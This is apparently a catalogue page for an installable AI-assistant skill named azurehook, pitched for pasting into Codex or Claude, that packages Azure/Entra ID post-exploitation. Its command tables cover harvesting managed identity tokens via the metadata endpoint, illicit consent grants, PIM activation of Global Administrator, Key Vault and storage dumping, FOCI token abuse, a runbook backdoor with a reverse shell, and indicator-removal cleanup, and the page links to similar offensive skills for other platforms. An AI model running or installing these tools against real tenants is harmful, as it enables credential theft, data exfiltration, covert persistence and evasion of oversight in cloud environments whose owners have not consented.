Menu
Azure/Entra ID post-exploitation for tenant compromise, Key Vault extraction, managed identity abuse, and token manipulation
Install with Codex or Claude Copy this prompt, paste it into Codex, Claude, or another assistant, and let it review the skill page and install it for you.
Based on SOC occupation classification
| name | azure-postexploit |
| description | Azure/Entra ID post-exploitation for tenant compromise, Key Vault extraction, managed identity abuse, and token manipulation |
| category | post-exploitation |
| tags | ["azure","entra-id","cloud","post-exploitation","keyvault","managed-identity","credential-access","persistence","token-abuse"] |
| tech_stack | ["azure","python","msal","msgraph","requests"] |
| cwe_ids | ["CWE-269","CWE-522","CWE-693","CWE-284"] |
| chains_with | ["T1078.004","T1552.001","T1098.001","T1550.001","T1528"] |
| prerequisites | ["T1078.004"] |
| version | 1.0 |
Azure post-exploitation uses Microsoft Graph API, Azure Resource Manager API, and direct IMDS access for tenant enumeration, privilege escalation, secret extraction, and persistence. After compromising Azure credentials or a managed identity, these tools provide comprehensive Entra ID and Azure resource exploitation capabilities.
pip3 install requests msal azure-identity azure-keyvault-secrets azure-storage-blobaz account show or Graph API /me endpoint# Quick prerequisite check
az account show # verify Azure CLI credentials
python3 -c "import requests; print('OK')" # verify requests
curl -s -H "Metadata:true" "http://169.254.169.254/metadata/instance?api-version=2021-02-01" 2>/dev/null && echo "IMDS available"
| Action | Command | Purpose |
|---|---|---|
| Entra ID enum | azurehook entra_enum | Enumerate users, groups, apps, SPs, conditional access |
| Managed identity | azurehook managed_identity | Extract managed identity tokens from VM/App Service |
| Action | Command | Purpose |
|---|---|---|
| Consent grant | azurehook entra_privesc --method consent_grant | Illicit consent grant for Directory.ReadWrite.All |
| PIM activation | azurehook entra_privesc --method pim_activate | Activate eligible Global Administrator role |
| SP secret | azurehook entra_privesc --method sp_secret | Add client secret to existing service principal |
| Action | Command | Purpose |
|---|---|---|
| Key Vault dump | azurehook keyvault_dump | Extract secrets, keys, certificates from Key Vaults |
| Storage dump | azurehook storage_dump | Download sensitive data from Blob Storage |
| Token abuse | azurehook azuread_token --action foci | Use FOCI to get tokens for multiple services |
| Action | Command | Purpose |
|---|---|---|
| Runbook backdoor | azurehook runbook_backdoor --automation-account NAME --resource-group RG | Create Automation runbook with reverse shell |
azurehook cleanup_azure
| Program | Technique | MITRE ATT&CK |
|---|---|---|
| entra_enum | Entra ID tenant enumeration | T1087.004 — Cloud Account |
| entra_privesc | Privilege escalation via consent/PIM/SP | T1098.001 — Additional Cloud Credentials |
| keyvault_dump | Key Vault secret extraction | T1555.006 — Cloud Secrets Management Stores |
| storage_dump | Azure Storage data exfiltration | T1530 — Data from Cloud Storage |
| managed_identity | Managed identity token harvest | T1552.005 — Cloud Instance Metadata API |
| runbook_backdoor | Automation Account persistence | T1525 — Implant Internal Image |
| azuread_token | Token manipulation and FOCI abuse | T1550.001 — Application Access Token |
| cleanup_azure | Resource removal and restoration | T1070 — Indicator Removal |
eBPF-based post-exploitation for kernel-level credential harvesting, process hiding, and traffic interception on Linux
AWS post-exploitation for IAM privilege escalation, data exfiltration, persistence, and operational security via boto3
CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab
Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence
macOS post-exploitation for credential harvesting, DTrace monitoring, TCC bypass, and stealth operations via native tools
Windows userland post-exploitation for credential harvesting, monitoring, AMSI/ETW bypass, and stealth operations